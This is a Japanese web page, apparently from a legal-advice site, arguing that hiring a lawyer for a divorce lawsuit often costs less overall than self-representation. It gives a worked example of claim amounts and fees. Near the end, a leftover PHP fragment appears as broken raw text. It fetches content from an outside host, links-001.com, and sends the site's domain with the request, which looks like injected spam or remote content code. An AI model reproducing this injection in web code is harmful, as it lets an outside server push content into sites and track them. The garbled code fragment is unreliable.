前へ
次へ

これから離婚裁判する場合には

もし、離婚をするときに当事者間の話し合いがなかなかうまくいかないことがあるとすれば、間に弁護士を入れ

more

離婚裁判で判決を出す必要はあるか

世の中には、離婚裁判をする人が少なくありません。離婚裁判をすることのメリットは、明確な判決を出すこと

more

なぜわざわざ離婚裁判をするのか

最近は、結婚した人の3分の1ほどが離婚すると言われています。当事者間で何らかの問題があるから離婚する

more

離婚裁判の費用面のメリットがある弁護士相談

離婚裁判には、主に2つの選択肢があります。弁護士に相談して裁判に臨むケースもあれば、自力で手続きを進める選択肢もあります。多くの方々は、自力の裁判を検討しています。そもそも弁護士に仕事を依頼する時は、費用を支払わなければなりません。法律事務所で相談した時は、弁護士に対して着手金などを支払う必要があります。そうかと思えば、弁護士に対する成功報酬もあります。そもそも離婚裁判になった時には、慰謝料などが請求されるケースも多いです。その慰謝料に対するパーセンテージが決められていて、指定のお金を支払う事になります。状況によっては、それなりにまとまった金額になる事もありますから、注意が必要です。数十万円ぐらいになるケースも、実際あります。多くの方々は、その金額を気にしている訳です。まとまった費用を支払うのも大変ですし、お金を節約したい時は自力の裁判が検討される事も多々あります。しかし自力で裁判に臨んだ時は、かなり不利になってしまう事も多いです。基本的には相手と話し合いする事になりますが、どうしても法律の知識が求められます。法律に詳しくないと、裁判で不利になってしまうケースも多いので、結局は多くの慰謝料を支払わざるを得ない事もあります。むしろ弁護士に相談する方が、お金を節約できるケースもあります。例えば自力で裁判に臨んだ時には、相手から350万円請求されたとします。それに対して弁護士を味方につけた時は、慰謝料の請求額は200万円といった具合になります。弁護士は法律に詳しいので、金額的に有利になるケースも多いです。確かに弁護士に依頼した時には、指定のお金を支払わなければなりません。ですが、たとえ弁護士に60万円支払うことになった時でも、実質的な支払い額は260万円になるでしょう。自力で裁判に臨むよりは、結局は金額的に有利になるケースも多いです。弁護士は手続きも代行してくれますし、法律事務所での相談を検討している方も少なくありません。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top